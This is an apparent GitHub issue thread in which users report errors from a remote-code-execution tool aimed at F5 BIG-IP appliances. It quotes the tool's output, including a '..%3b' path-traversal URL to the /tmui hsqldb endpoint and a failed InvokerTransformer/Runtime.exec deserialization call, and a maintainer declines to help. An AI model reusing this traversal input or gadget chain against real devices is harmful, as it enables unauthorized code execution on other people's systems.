### ISSUE TITLE
The method 'exec' on 'class java.lang.Runtime' threw an exception

### ISSUE THREAD

**Issue by shark2da** [Critical-Start/Team-Ares#5]
Anyone has the same problem？

> localhost.localdomain.der already exists. skipping extraction step
> jdbc:hsqldb:https://localhost.localdomain:443/tmui/login.jsp/..%3b/hsqldb/
> Connecting to localhost.localdomain
> 40001
> Unexpected SQL error
> java.sql.SQLException: Serialization failure: InvokerTransformer: The method 'exec' on 'class java.lang.Runtime' threw an exception
> 	at org.hsqldb.jdbc.Util.sqlException(Unknown Source)
> 	at org.hsqldb.jdbc.jdbcStatement.fetchResult(Unknown Source)
> 	at org.hsqldb.jdbc.jdbcStatement.execute(Unknown Source)
> 	at f5RCE.main(f5RCE.java:53)

> java 11.0.7 2020-04-14 LTS
> Java(TM) SE Runtime Environment 18.9 (build 11.0.7+8-LTS)
> Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.7+8-LTS, mixed mode)

**Comment by mirchr** [comment]
At this time we cannot assist with any problems related to this code.

**Comment by caonima-png** [comment]
I also encountered the same problem
